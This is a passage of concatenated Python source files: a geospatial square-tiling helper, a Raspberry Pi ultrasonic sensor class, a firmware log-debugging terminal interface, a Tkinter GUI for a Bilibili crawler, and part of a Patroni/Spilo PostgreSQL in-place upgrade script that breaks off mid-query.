image_out = image_out *255
image_out = image_out.astype('uint8')
return(image_out)
def chunks(l, n = 3000):
result = list()
for i in range(0, len(l), n):
result.append(l[i:i+n])
return(result)
def cover(bounds, w):
if str(type(bounds)) == "<class 'shapely.geometry.polygon.Polygon'>" :
bounds = [bounds]
elif str(type(bounds)) =="<class 'shapely.geometry.multipolygon.MultiPolygon'>":
bounds = bounds
else:
raise ValueError('bounds must be a shapely polygon or multipolygon')
bound = bounds[0]
coords_total = pd.DataFrame()
for bound in bounds:
x1, y1, x2, y2 = bound.bounds
step_y = w/geodesic((y1,x1), (y1 - 1,x1)).meters
parts_y = math.floor((y2 - y1)/ step_y + 1)
y1_vec = y1 + np.arange(0, parts_y )*step_y
y2_vec = y1 + np.arange(1, parts_y +1 )*step_y
steps_x = [ w/geodesic((y,x1), (y,x1+1)).meters for y in y1_vec ]
parts_x = [math.floor( (x2-x1) /step +1 ) for step in steps_x ]
coords = pd.DataFrame()
for n in np.arange(len(parts_x)):
x1_sq = [ x1 + j*steps_x[n] for j in np.arange(0,parts_x[n]) ]
x2_sq = [ x1 + j*steps_x[n] for j in np.arange(1, parts_x[n]+1) ]
coords_temp = {'x1': x1_sq, 'x2': x2_sq, 'y1': y1_vec[n], 'y2':y2_vec[n]}
coords = coords.append(pd.DataFrame(coords_temp))
coords_total = coords_total.append(coords)
cover = [Polygon([ (coords_total['x1'].iloc[j] , coords_total['y1'].iloc[j]) , (coords_total['x2'].iloc[j] , coords_total['y1'].iloc[j]), (coords_total['x2'].iloc[j] , coords_total['y2'].iloc[j]), (coords_total['x1'].iloc[j] , coords_total['y2'].iloc[j]) ]) for j in np.arange(coords_total.shape[0])]
coords = gpd.GeoDataFrame({'geometry': cover, 'x1':coords_total['x1'], 'x2':coords_total['x2'], 'y1':coords_total['y1'], 'y2':coords_total['y2'] })
coords.crs = {'init': 'epsg:4326'}
return(coords)
def loadingBar(count,total):
if total == 0:
return
else:
percent = float(count)/float(total)*100
sys.stdout.write("\r" + str(int(count)).rjust(3,'0')+"/"+str(int(total)).rjust(3,'0') + ' [' + '='*int(percent) + ' '*(100-int(percent)) + ']')
########################
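if __name__ == '__main__':
    # Minimal local sketch of two helpers above (no API calls are made): cover() tiles a
    # polygon's bounding box with squares of roughly w meters, and chunks() splits a list
    # into batches. The polygon is a hypothetical area, purely for illustration.
    demo_area = Polygon([(4.0, 52.0), (4.1, 52.0), (4.1, 52.1), (4.0, 52.1)])
    squares = cover(demo_area, w = 1000)
    print(squares.shape[0], 'covering squares of roughly 1 km')
    print(chunks(list(range(10)), n = 3))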
|
UltrasonikSensor.py
|
import RPi.GPIO as GPIO
from time import sleep, time
from threading import Thread
class UltrasonicSensor:
def __init__(self, echo, trig, setup=GPIO.BOARD):
self.echo = echo
self.trig = trig
self.Time = 0
self.currentValue = 0
GPIO.setmode(setup)
GPIO.setup(self.trig, GPIO.OUT)
GPIO.setup(self.echo, GPIO.IN)
GPIO.output(trig, False)
def startMeasuringDistance(self):
Thread(target=self.__measureDistance__).start()
sleep(0.2)
def readDistance(self):
return self.currentValue
    def __measureDistance__(self):
        while True:
            # Send a short trigger pulse (HC-SR04 style sensors expect roughly 10 microseconds).
            GPIO.output(self.trig, True)
            sleep(0.0001)
            GPIO.output(self.trig, False)
            # Record when the echo pin goes high (pulse start) and when it drops low again (pulse end).
            signalBeginning = time()
            signalEnd = time()
            while GPIO.input(self.echo) == 0:
                signalBeginning = time()
            while GPIO.input(self.echo) == 1:
                signalEnd = time()
            self.Time = signalEnd - signalBeginning
            # Distance in cm: round-trip time * speed of sound (34300 cm/s) / 2 = time * 17150.
            self.currentValue = self.Time * 17150
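if __name__ == '__main__':
    # Minimal usage sketch. Assumptions: an HC-SR04-style sensor wired with its echo pin on
    # board pin 11 and its trigger pin on board pin 7 -- adjust to match your wiring.
    sensor = UltrasonicSensor(echo=11, trig=7)
    sensor.startMeasuringDistance()
    try:
        while True:
            print('distance: %.1f cm' % sensor.readDistance())
            sleep(0.5)
    except KeyboardInterrupt:
        GPIO.cleanup()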
|
tool_debug_if.py
|
'''
Debugging interface for the OBC firmware.
'''
import argparse
import subprocess
import sys
from threading import Thread
from queue import Queue, Empty
import signal
import re
import time
from pathlib import Path
from blessed import Terminal
# Whether or not we're running on a POSIX system (linux, mac etc.)
ON_POSIX = 'posix' in sys.builtin_module_names
# Regex pattern that splits of ANSI escape sequences
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
LOG_LEVEL_MAP = {
'TRC': 'trace',
'DBG': 'debug',
'---': 'info',
'WRN': 'warning',
'ERR': 'error'
}
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
class LogLine:
raw_ascii = None
time = None
level = None
file = None
line = None
module = None
message = None
event_code = None
@staticmethod
def parse(line):
log_line = LogLine()
log_line.raw_ascii = line.strip()
# Remove ansi codes
line = ANSI_ESCAPE.sub('', line)
# Split the line on spaces
parts = line.split()
# Parse the pieces of the log line
try:
log_line.time = int(parts[1])
except:
pass
log_line.level = LOG_LEVEL_MAP[parts[2][0:3]]
log_line.file = parts[3].split(':')[0]
log_line.line = parts[3].split(':')[1]
log_line.message = ' '.join(parts[4:-1])
# The module is either the part of the name before the _, or the whole
# name. If the first letter is uppercase that's a module name,
# otherwise it's the whole name.
path = Path(log_line.file)
if path.name[0].isupper():
log_line.module = path.name.split('_')[0]
else:
log_line.module = path.stem
        # If the message starts with 'EVENT: ', mark this line as an event and
        # store its event code
        if log_line.message.startswith('EVENT: '):
            log_line.event_code = log_line.message.replace('EVENT: ', '')
return log_line
def print(self, term, link_num):
# Get the root dir
root_dir = Path(__file__).parent.parent.parent.absolute()
# Replace the file position with a link which opens the file. TODO:
# this doesn't seem to work just yet
print(
self.raw_ascii.replace(
f'{self.file}:{self.line}',
term.link(
f'file://{root_dir}/src/{self.file}',
f'{self.file}:{self.line}',
link_num
)
)
)
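# Hedged illustration of LogLine.parse (the field layout below is inferred from the parsing
# code above, not taken from real firmware output):
#
#     line = '> 1024 DBG Eeprom_driver.c:88 write complete OK'
#     ll = LogLine.parse(line)
#     # ll.time == 1024, ll.level == 'debug', ll.file == 'Eeprom_driver.c',
#     # ll.line == '88', ll.module == 'Eeprom', ll.message == 'write complete'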
class Interface:
run = True
def __init__(self, exec_name):
self.log_lines = []
self.term = Terminal()
self.term.enter_fullscreen()
print(self.term.clear)
self.term.csr(1, self.term.height - 2)
self.log_pos = 0
self.exec_name = exec_name
self.opmode = 0
self.time = 0
self.command = ''
self.num_links = 0
def __del__(self):
self.term.exit_fullscreen()
def update(self):
term = self.term
filtered_lines = list(self.filtered_log_lines())
# Handle key presses
with self.term.cbreak():
key = self.term.inkey(timeout=0)
if not key:
pass
# elif key.name == 'KEY_UP' and self.log_pos > 0:
# self.log_pos -= 1
# self.update_log_lines = True
# elif key.name == 'KEY_DOWN' and self.log_pos < len(filtered_lines):
# self.log_pos += 1
# self.update_log_lines = True
# elif key == 'q':
# self.run = False
else:
self.command += key
# Print exec name
with term.hidden_cursor(), term.location(0, 0):
print(self.exec_name)
# Get string with time and opmode
status_str = f'OPMODE: {self.opmode} TIME: {self.time}'
print(
term.move_xy(term.width - term.length(status_str), 0)
+
status_str
)
# Write command at the bottom
print(term.move_xy(0, term.height - 1) + term.clear_eol + self.command)
def add_log_line(self, log_line):
self.log_lines.append(log_line)
self.time = log_line.time
if self.log_line_filter(log_line) is not None:
log_line.print(self.term, self.num_links)
self.num_links += 1
self.update_log_lines = True
def log_line_filter(self, log_line):
if log_line.event_code:
return log_line
elif log_line.level == 'trace':
return None
else:
return log_line
def filtered_log_lines(self):
return filter(self.log_line_filter, self.log_lines)
def main(executable = None):
'''
Run the main debugging environment.
Parameters:
executable - path to the executable to run, or None to connect to serial
'''
# Branch depending on whether connecting to serial or running exec
if executable is None:
# TODO: serial
print('Serial not yet supported')
else:
run_exec(executable)
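# enqueue_output runs in a background thread and pushes every stdout line of the child
# process into a Queue; the main loop can then poll the queue with get_nowait() instead
# of blocking on readline(), which keeps the terminal UI responsive.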
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def run_exec(executable):
'''
Run an executable firmware image using subprocess.
'''
process = subprocess.Popen(
executable,
stdout=subprocess.PIPE,
close_fds=ON_POSIX
)
queue = Queue()
thread = Thread(target=enqueue_output, args=(process.stdout, queue))
thread.daemon = True
thread.start()
killer = GracefulKiller()
interface = Interface(executable)
while interface.run:
# Read a line from out in a non-blocking way
try:
line = queue.get_nowait()
except Empty:
# No output
pass
else:
# Decode the line from raw bytes to ascii, also strip any
            # newline/whitespace off the line
line_ascii = line.decode('ascii').strip()
# Parse the parts of the line and add it to the interface
interface.add_log_line(LogLine.parse(line_ascii))
# Update the interface
interface.update()
    # Delete the interface, which exits full-screen mode
del interface
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(
        description='Debugging interface for the OBC firmware.'
)
parser.add_argument(
'executable', metavar='E', type=str, nargs='?',
help='executable to run, or none to connect to serial'
)
args = parser.parse_args()
main(args.executable)
|
spider_gui_mode.pyw
|
# -*- coding: UTF-8 -*-
from bilispider import spider
import os
import sys
import time
import queue
import requests
import threading
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.font as tkFont
import tkinter.messagebox as tkmsgbox
from tkinter.filedialog import askdirectory
class spider_gui_mode(spider,threading.Thread):
def __init__(self,rid,config={}):
threading.Thread.__init__(self,daemon=True)
spider.__init__(self,rid,config)
def set_logger(self,config):
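        # gui_logger mimics the logging.Logger interface (debug/info/warning/error/fatal) but,
        # instead of writing to a stream, pushes (level, timestamp, message) tuples into a
        # queue that the Tk process window later drains and renders.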
class gui_logger(object):
def __init__(self):
self.log = queue.Queue()
def add_log(self,level,msg):
self.log.put((level,time.time(),msg),block=False)
def debug(self,msg,*args,**kwargs):
self.add_log(1,msg)
def info(self,msg,*args,**kwargs):
self.add_log(2,msg)
def warning(self,msg,*args,**kwargs):
self.add_log(3,msg)
def error(self,msg,*args,**kwargs):
self.add_log(4,msg)
def fatal(self,msg,*args,**kwargs):
self.add_log(5,msg)
self.SHOW_BAR = False
self.QUITE_MODE = False
self._logger = gui_logger()
def run(self):
self.auto_run()
def get_logger(self):
return self._logger.log
def get_status(self):
return self.status
class root_window():
def __init__(self):
pass
def show_window(self):
config = {}
root = tk.Tk()
root.title('设置')
root.resizable(0,0)
show_more_choice = tk.BooleanVar(root,value=0)
get_full_info = tk.BooleanVar(root,value=0)
working_path = tk.StringVar(root,value=os.getcwd())
output_choice = tk.IntVar(root,value=config.get('output',1))
thread_num = tk.IntVar(root,value=config.get('thread_num',2))
http_port = tk.IntVar(root,value=config.get('http',1214))
disable_http = tk.BooleanVar(root,value=0)
        # Show the basic options
es_frame = tk.Frame(root)
ttk.Label(es_frame,text="分区id").grid(row=0,sticky=tk.E,padx=0)
ttk.Label(es_frame,text="从url识别").grid(row=1,sticky=tk.E,padx=0)
ttk.Label(es_frame,text="工作目录").grid(row=2,sticky=tk.E,padx=0)
        # Load the tid entry box
tid_entry = ttk.Combobox(es_frame,width=18)
self.tid_entry = tid_entry
tid_entry.grid(row=0,column=1,sticky=tk.W)
tid_info = self.load_tid_info()
tid_option = tuple(" - ".join(line) for line in filter(lambda line:line[1],tid_info))
tid_entry.config(value=tid_option)
tid_entry.insert(0,config.get('tid',''))
self.tid_entry_focusout()
tid_entry.bind("<FocusOut>",self.tid_entry_focusout)
#tid_entry.bind("<Leave>",tid_entry_focusout)
tid_entry.bind("<KeyRelease>",self.tid_entry_change)
tid_entry.bind("<FocusIn>",self.tid_entry_focusin)
tid_entry.bind("<ButtonRelease-1>",self.tid_entry_focusin)
tid_entry.bind("<Return>",self.tid_entry_onreturn)
        # URL entry box
url_entry = ttk.Entry(es_frame,width=40)
url_entry.grid(row=1,column=1,columnspan=3,sticky=tk.W)
url_entry.bind("<Return>",self.get_tid)
url_entry.bind("<FocusIn>",self.url_entry_focusin)
        # Working-directory entry box
ttk.Entry(es_frame,width=30,textvariable=working_path).grid(row=2,column=1,columnspan=2,sticky=tk.W)
#ttk.Button(es_frame,text='确认',width=5,command=get_tid).grid(row=0,column=2,sticky=tk.W)
ttk.Button(es_frame,text='选择',width=5,command=self.selectpath).grid(row=2,column=3,sticky=tk.W)
tid_info_label = ttk.Label(es_frame)
tid_info_label.grid(row=0,column=2,columnspan=2,padx=10,sticky=tk.W)
es_frame.columnconfigure(0,minsize=80)
es_frame.columnconfigure(1,minsize=10)
es_frame.columnconfigure(2,minsize=80)
es_frame.columnconfigure(3,minsize=100)
es_frame.pack()
        # Advanced options
ad_frame = tk.Frame(root)
#logmode_choice = tk.IntVar(root,value=config.get('logmode',1))
        # Add a separator line
ttk.Separator(ad_frame,orient=tk.HORIZONTAL).grid(row=0,column=0,columnspan=4,sticky="we",pady=8,padx=0)
        # Add label widgets
ttk.Label(ad_frame,text='输出级别').grid(row=1,column=0,padx=(0,10))
ttk.Label(ad_frame,text='线程数').grid(row=3,column=0)
ttk.Label(ad_frame,text='http服务器端口').grid(row=4,column=0,padx=(0,10))
        # Log-level radio buttons
logmode_description = ('DEBUG','INFO','ERROR')
for i in range(3):
ttk.Radiobutton(ad_frame,text=logmode_description[i],variable=output_choice,value=i).grid(row=1,column=i+1,stick=tk.W)
        # Add the thread-count slider
ttk.Scale(ad_frame, from_=1, to=10,length=150,variable=thread_num,command=self.show_thread_num).grid(row=3,column=1,columnspan=2)
thread_num_label = tk.Label(ad_frame,text='2')
thread_num_label.grid(row=3,column=3)
        # Add the port entry box
http_scale = ttk.Scale(ad_frame, from_=1, to=2000,length=150,variable=http_port,command=self.set_port)
http_scale.grid(row=4,column=1,columnspan=2)
ttk.Entry(ad_frame,textvariable=http_port,width=6).grid(row=4,column=3)
        # Add the checkboxes
ttk.Checkbutton(ad_frame,text='收集完整信息',variable=get_full_info).grid(row=5,rowspan=3,column=0,padx=(0,10))
ttk.Checkbutton(ad_frame,text='禁用监视',variable=disable_http,command=self.http_switch).grid(row=5,rowspan=2,column=1)
        # End of advanced options
buttom_frame = tk.Frame(root)
ttk.Checkbutton(buttom_frame,text='展开高级选项',width=12,command=self.show_more_or_less,variable=show_more_choice).pack(side=tk.RIGHT,fill=tk.X,padx=(10,20))
ttk.Button(buttom_frame,text='退出',width=8,command=sys.exit).pack(side=tk.RIGHT,fill=tk.X,padx=(10,20))
ttk.Button(buttom_frame,text='开始',width=8,command=self.on_start).pack(side=tk.RIGHT,fill=tk.X,padx=(60,20))
buttom_frame.pack(pady=(7,5))
tid_entry.focus_set()
self.root = root
self.config = config
self.working_path = working_path
self.show_more_choice = show_more_choice
self.ad_frame = ad_frame
self.output_choice = output_choice
self.thread_num = thread_num
self.http_port = http_port
# self.tid_entry = tid_entry
self.tid_info_label = tid_info_label
self.url_entry = url_entry
self.es_frame = es_frame
self.thread_num_label = thread_num_label
self.tid_info = tid_info
self.get_full_info = get_full_info
self.http_scale = http_scale
self.disable_http = disable_http
#self.http_port.config(state=tk.DISABLED)
root.mainloop()
def get_tid(self,event):
# if not url_entry.get():
# if tid_entry.get():
# tkmsgbox.showinfo("提醒","已输入分区id,请点击 开始")
# else :
# tkmsgbox.showinfo("错误","请填入视频url或者av号")
# return
self.tid_info_label.config(text = '正在获取')
try:
from bilispider.tools import get_tid_by_url,aid_decode
            info = get_tid_by_url(aid_decode(self.url_entry.get()))
            assert len(info[0])<40
            self.tid_entry.delete(0,tk.END)
            self.tid_entry.insert(0," - ".join(info))
            self.tid_info_label.config(text = "获取成功")
except:
self.tid_info_label.config(text = '获取失败')
def show_more_or_less(self):
if self.show_more_choice.get():
self.ad_frame.pack(after=self.es_frame)
else:
self.ad_frame.forget()
def http_switch(self):
if self.disable_http.get():
self.http_scale.config(state=tk.DISABLED)
self.his_http = self.http_port.get()
self.http_port.set(0)
else:
self.http_scale.config(state=tk.NORMAL)
self.http_port.set(getattr(self,'his_http',1214))
def show_thread_num(self,pos):
self.thread_num_label.config(text=str(self.thread_num.get()))
def set_port(self,pos):
self.http_port.set(int(self.http_port.get()))
def selectpath(self):
path = askdirectory(initialdir=self.working_path.get())
if path:
self.working_path.set(path)
def tid_entry_focusout(self,*args,**kwargs):
self.tid_entry.select_clear()
# if tid_entry.get().split("-")[0].strip().isdigit():
# tid = tid_entry.get().split("-")[0].strip()
# info = list(filter(lambda line:line[0]==tid,tid_inf))
# if len(info) == 0:
# return
# elif info[0][1]:
# tid_entry.delete(0,tk.END)
# tid_entry.insert(0," - ".join(info[0]))
def tid_entry_focusin(self,event):
self.tid_info_label.config(text="")
index = len(self.tid_entry.get().split('-')[0].strip())
self.tid_entry.select_range(0,index)
self.tid_entry.icursor(index)
def tid_entry_change(self,event):
tid_entry = self.tid_entry
tid = tid_entry.get().split("-")[0]
if tid.startswith(' '):
tid = tid.lstrip()
tid_entry.delete(0,tk.END)
if not tid == '':
                tid_entry.insert(0,tid)
if event.keycode == 8 :
tid_entry.delete(tid_entry.index(tk.INSERT)-1,tk.INSERT)
elif event.keycode in (37,39):
if tid_entry.index(tk.INSERT) > len(tid)-1:
tid_entry.icursor(len(tid)-1)
tid_entry.select_range(0,tk.INSERT)
return
if tid:
tid = tid.rstrip()
info = list(filter(lambda line:line[0].startswith(tid) or line[0]==tid,self.tid_info))
#print(info)
if len(info) > 0:
index = tid_entry.index(tk.INSERT)
tid_entry.delete(0,tk.END)
tid_entry.insert(0," - ".join(info[0]))
tid_entry.icursor(index)
if index < len(info[0][0]):
#tid_entry.select_range(tk.INSERT,tk.END)
tid_entry.select_range(tk.INSERT,len(info[0][0]))
else :
tid_entry.delete(tk.INSERT,tk.END)
def tid_entry_onreturn(self,event):
self.tid_entry_focusout(event)
self.on_start()
def url_entry_focusin(self,event):
self.url_entry.select_range(0,tk.END)
self.tid_info_label.config(text="按下回车以获取tid")
def load_tid_info(self):
try:
from pkg_resources import resource_string
tid_info_str = resource_string('bilispider', 'data/tid.txt').decode()
except:
print("无法载入")
return tuple()
tid_info = [line.split(',') for line in tid_info_str.split('\r\n')]
return tid_info
def on_start(self):
os.chdir(self.working_path.get())
config = self.config
try:
config['tid'] = (int(self.tid_entry.get().split(" - ")[0]),)
except:
tkmsgbox.showwarning("警告","分区id无效")
return
config['output'] = 0
config['thread_num'] = int(self.thread_num.get())
config['http'] = int(self.http_port.get())
config['gui_output'] = self.output_choice.get()
config['save_full'] = self.get_full_info.get()
        self.root.withdraw()  # hide the main window
process_window(config,self).show_window()
class process_window():
def __init__(self,config,father):
self.config = config
self.father = father
def show_window(self):
root = tk.Tk()
root.title("bilispider")
root.resizable(0,0)
top_frame = tk.Frame(root)
top_frame.pack(fill=tk.BOTH)
process_bar = ttk.Progressbar(top_frame,mode="indeterminate",length=300)
process_bar.pack(anchor='w',side=tk.LEFT)
progress_label = ttk.Label(top_frame,text="初始化")
progress_label.pack(after=process_bar)
mid_frame = tk.Frame(root)
mid_frame.pack()
log_text = tk.Text(mid_frame,height=20,width=60)
log_text.pack(side=tk.LEFT,fill=tk.Y)
log_scrollbar = tk.Scrollbar(mid_frame)
log_scrollbar.pack(side=tk.LEFT,after=log_text,fill=tk.Y)
log_scrollbar.config(command=log_text.yview)
log_text.config(yscrollcommand=log_scrollbar.set)
buttom_frame = ttk.Frame(root)
buttom_frame.pack(fill=tk.BOTH)
ttk.Button(buttom_frame,text="显示更多",command=self.show_more_info).pack(side=tk.LEFT,padx=(80,0))
pause_botton = ttk.Button(buttom_frame,text="暂停",command=self.set_pause)
pause_botton.pack(side=tk.RIGHT,padx=(0,80))
process_bar.start()
root.protocol("WM_DELETE_WINDOW", self.processwindow_on_closing)
spider = spider_gui_mode(self.config['tid'][0],self.config)
spider.start()
self.root = root
self.process_bar = process_bar
self.log_text = log_text
self.progress_label = progress_label
self.spider = spider
self.pause_botton = pause_botton
threading.Thread(target=self.monitor_loop,daemon=True).start()
root.mainloop()
def set_pause(self,multi=False):
if multi:
self.pause_botton.config(state=tk.DISABLED)
self.root.update()
self.spider.set_pause(1)
self.pause_botton.config(text='继续',command=self.set_continue)
self.pause_botton.config(state=tk.NORMAL)
else:
threading.Thread(target=self.set_pause,args=(True,),name="set_pause").start()
def set_continue(self):
self.pause_botton.config(state=tk.DISABLED)
self.root.update()
self.spider.set_pause(0)
self.pause_botton.config(text='暂停',command=self.set_pause)
self.pause_botton.config(state=tk.NORMAL)
def processwindow_on_closing(self):
if self.spider.is_alive():
if tkmsgbox.askokcancel("确认退出", "爬虫正在运行,若强制退出可能损失部分数据"):
# if self.spider.get_http_thread():
# try:
# requests.get('http://localhost:1214/exit',timeout=0.1)
# except:
# pass
self.father.root.destroy()
self.root.destroy()
sys.exit()
else:
# if self.spider.get_http_thread():
# try:
# requests.get('http://localhost:1214/exit',timeout=0.1)
# except:
# pass
self.father.root.destroy()
self.root.destroy()
sys.exit()
def show_log(self):
log_text = self.log_text
while not self.spider.get_logger().empty():
log_line = self.spider.get_logger().get(block=False)
if self.output_level == 1 and log_line[0] < 2:
continue
elif self.output_level == 2 and log_line[0] < 4:
continue
strtime = time.strftime("%H:%M:%S", time.localtime(log_line[1]))
line_index = int(log_text.index(tk.END).split('.')[0])-1
log_level = self.log_level_list[log_line[0]]
log_text.insert(tk.END,"[{}][{}]{}\n".format(strtime,log_level,log_line[2]))
log_text.tag_add(log_level,"%s.%s"%(line_index,10),"%s.%s"%(line_index,len(log_level)+12))
log_text.tag_add("time","%s.%s"%(line_index,0),"%s.%s"%(line_index,10))
log_text.see(tk.END)
def monitor_loop(self):
log_text = self.log_text
self.process_bar.stop()
self.process_bar.config(mode="determinate")
self.output_level = self.config['gui_output']
self.log_level_list= ('','DEBUG','INFO','WARNING','ERROR','FATAL')
log_text.tag_config("DEBUG",foreground="forestgreen")
log_text.tag_config("INFO",foreground="blue")
log_text.tag_config("WARNING",foreground="orange")
log_text.tag_config("ERROR",foreground="yellow",background="red")
log_text.tag_config("FATAL",foreground="orangered",background="black")
log_text.tag_config("time",foreground="dimgray")
while True:
self.show_log()
            percentage = self.spider.status.get('percentage',0)*100
            self.process_bar.config(value = percentage)
            self.progress_label.config(text= "%.2f" % percentage +" %" )
if not self.spider.is_alive():
break
time.sleep(0.1)
self.show_log()
if self.spider.status['progress'] == 'fatal':
self.process_bar.config(value=0)
self.progress_label.config(text="失败")
else:
self.process_bar.config(value=100)
self.progress_label.config(text="完成")
def show_more_info(self):
detail_window(self).show_window()
class detail_window():
def __init__(self,father):
self.father = father
def show_window(self):
root = tk.Tk()
self.detail_text = tk.Text(root,height = 13,width = 45)
self.detail_text.pack()
root.protocol("WM_DELETE_WINDOW", self.detailwindow_on_closing)
self.flag = True
threading.Thread(target=self.refresh,daemon=True).start()
self.root = root
root.mainloop()
def refresh(self):
#self.detail_text.insert(1.0,' ')
while self.flag:
self.detail_text.delete(1.0,tk.END)
detail = "\n".join(":".join(map(str,i)) for i in self.father.spider.status.items())
self.detail_text.insert(1.0,detail)
time.sleep(0.5)
def detailwindow_on_closing(self):
self.flag = False
self.root.destroy()
if __name__ == "__main__":
root_window().show_window()
|
inplace_upgrade.py
|
#!/usr/bin/env python
import json
import logging
import os
import psutil
import psycopg2
import shlex
import shutil
import subprocess
import sys
import time
import yaml
from collections import defaultdict
from threading import Thread
from multiprocessing.pool import ThreadPool
logger = logging.getLogger(__name__)
RSYNC_PORT = 5432
def patch_wale_prefix(value, new_version):
from spilo_commons import is_valid_pg_version
if '/spilo/' in value and '/wal/' in value: # path crafted in the configure_spilo.py?
basename, old_version = os.path.split(value.rstrip('/'))
if is_valid_pg_version(old_version) and old_version != new_version:
return os.path.join(basename, new_version)
return value
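# Hedged illustration (the prefix is hypothetical): with new_version = '13',
#   'https://example.com/spilo/mycluster/wal/12/' -> 'https://example.com/spilo/mycluster/wal/13'
# Values that do not end in a valid, different PG version are returned unchanged.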
def update_configs(new_version):
from spilo_commons import append_extentions, get_bin_dir, get_patroni_config, write_file, write_patroni_config
config = get_patroni_config()
config['postgresql']['bin_dir'] = get_bin_dir(new_version)
version = float(new_version)
shared_preload_libraries = config['postgresql'].get('parameters', {}).get('shared_preload_libraries')
if shared_preload_libraries is not None:
config['postgresql']['parameters']['shared_preload_libraries'] =\
append_extentions(shared_preload_libraries, version)
extwlist_extensions = config['postgresql'].get('parameters', {}).get('extwlist.extensions')
if extwlist_extensions is not None:
config['postgresql']['parameters']['extwlist.extensions'] =\
append_extentions(extwlist_extensions, version, True)
write_patroni_config(config, True)
# update wal-e/wal-g envdir files
restore_command = shlex.split(config['postgresql'].get('recovery_conf', {}).get('restore_command', ''))
if len(restore_command) > 4 and restore_command[0] == 'envdir':
envdir = restore_command[1]
try:
for name in os.listdir(envdir):
# len('WALE__PREFIX') = 12
if len(name) > 12 and name.endswith('_PREFIX') and name[:5] in ('WALE_', 'WALG_'):
name = os.path.join(envdir, name)
try:
with open(name) as f:
value = f.read().strip()
new_value = patch_wale_prefix(value, new_version)
if new_value != value:
write_file(new_value, name, True)
except Exception as e:
logger.error('Failed to process %s: %r', name, e)
except Exception:
pass
else:
return envdir
def kill_patroni():
logger.info('Restarting patroni')
patroni = next(iter(filter(lambda p: p.info['name'] == 'patroni', psutil.process_iter(['name']))), None)
if patroni:
patroni.kill()
class InplaceUpgrade(object):
def __init__(self, config):
from patroni.dcs import get_dcs
from patroni.request import PatroniRequest
from pg_upgrade import PostgresqlUpgrade
self.config = config
self.postgresql = PostgresqlUpgrade(config)
self.cluster_version = self.postgresql.get_cluster_version()
self.desired_version = self.get_desired_version()
self.upgrade_required = float(self.cluster_version) < float(self.desired_version)
self.paused = False
self.new_data_created = False
self.upgrade_complete = False
self.rsyncd_configs_created = False
self.rsyncd_started = False
if self.upgrade_required:
self.dcs = get_dcs(config)
self.request = PatroniRequest(config, True)
@staticmethod
def get_desired_version():
from spilo_commons import get_bin_dir, get_binary_version
try:
spilo_configuration = yaml.safe_load(os.environ.get('SPILO_CONFIGURATION', ''))
bin_dir = spilo_configuration.get('postgresql', {}).get('bin_dir')
except Exception:
bin_dir = None
if not bin_dir and os.environ.get('PGVERSION'):
bin_dir = get_bin_dir(os.environ['PGVERSION'])
return get_binary_version(bin_dir)
def check_patroni_api(self, member):
try:
response = self.request(member, timeout=2, retries=0)
return response.status == 200
except Exception as e:
            return logger.error('API request to %s failed: %r', member.name, e)
def toggle_pause(self, paused):
from patroni.utils import polling_loop
cluster = self.dcs.get_cluster()
config = cluster.config.data.copy()
if cluster.is_paused() == paused:
return logger.error('Cluster is %spaused, can not continue', ('' if paused else 'not '))
config['pause'] = paused
if not self.dcs.set_config_value(json.dumps(config, separators=(',', ':')), cluster.config.index):
return logger.error('Failed to pause cluster, can not continue')
self.paused = paused
old = {m.name: m.index for m in cluster.members if m.api_url}
ttl = cluster.config.data.get('ttl', self.dcs.ttl)
for _ in polling_loop(ttl + 1):
cluster = self.dcs.get_cluster()
if all(m.data.get('pause', False) == paused for m in cluster.members if m.name in old):
logger.info('Maintenance mode %s', ('enabled' if paused else 'disabled'))
return True
remaining = [m.name for m in cluster.members if m.data.get('pause', False) != paused
and m.name in old and old[m.name] != m.index]
if remaining:
return logger.error("%s members didn't recognized pause state after %s seconds", remaining, ttl)
def resume_cluster(self):
if self.paused:
try:
logger.info('Disabling maintenance mode')
self.toggle_pause(False)
except Exception as e:
logger.error('Failed to resume cluster: %r', e)
def ensure_replicas_state(self, cluster):
"""
This method checks the satatus of all replicas and also tries to open connections
to all of them and puts into the `self.replica_connections` dict for a future usage.
"""
self.replica_connections = {}
streaming = {a: l for a, l in self.postgresql.query(
("SELECT client_addr, pg_catalog.pg_{0}_{1}_diff(pg_catalog.pg_current_{0}_{1}(),"
" COALESCE(replay_{1}, '0/0'))::bigint FROM pg_catalog.pg_stat_replication")
.format(self.postgresql.wal_name, self.postgresql.lsn_name))}
def ensure_replica_state(member):
ip = member.conn_kwargs().get('host')
lag = streaming.get(ip)
if lag is None:
return logger.error('Member %s is not streaming from the primary', member.name)
if lag > 16*1024*1024:
return logger.error('Replication lag %s on member %s is too high', lag, member.name)
if not self.check_patroni_api(member):
return logger.error('Patroni on %s is not healthy', member.name)
conn_kwargs = member.conn_kwargs(self.postgresql.config.superuser)
conn_kwargs['options'] = '-c statement_timeout=0 -c search_path='
conn_kwargs.pop('connect_timeout', None)
conn = psycopg2.connect(**conn_kwargs)
conn.autocommit = True
cur = conn.cursor()
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return logger.error('Member %s is not running as replica!', member.name)
self.replica_connections[member.name] = (ip, cur)
return True
return all(ensure_replica_state(member) for member in cluster.members if member.name != self.postgresql.name)
def sanity_checks(self, cluster):
if not cluster.initialize:
return logger.error('Upgrade can not be triggered because the cluster is not initialized')
if len(cluster.members) != self.replica_count:
return logger.error('Upgrade can not be triggered because the number of replicas does not match (%s != %s)',
len(cluster.members), self.replica_count)
if cluster.is_paused():
return logger.error('Upgrade can not be triggered because Patroni is in maintenance mode')
lock_owner = cluster.leader and cluster.leader.name
if lock_owner != self.postgresql.name:
return logger.error('Upgrade can not be triggered because the current node does not own the leader lock')
return self.ensure_replicas_state(cluster)
def remove_initialize_key(self):
from patroni.utils import polling_loop
for _ in polling_loop(10):
cluster = self.dcs.get_cluster()
if cluster.initialize is None:
return True
logging.info('Removing initialize key')
if self.dcs.cancel_initialization():
return True
logger.error('Failed to remove initialize key')
def wait_for_replicas(self, checkpoint_lsn):
from patroni.utils import polling_loop
logger.info('Waiting for replica nodes to catch up with primary')
query = ("SELECT pg_catalog.pg_{0}_{1}_diff(pg_catalog.pg_last_{0}_replay_{1}(),"
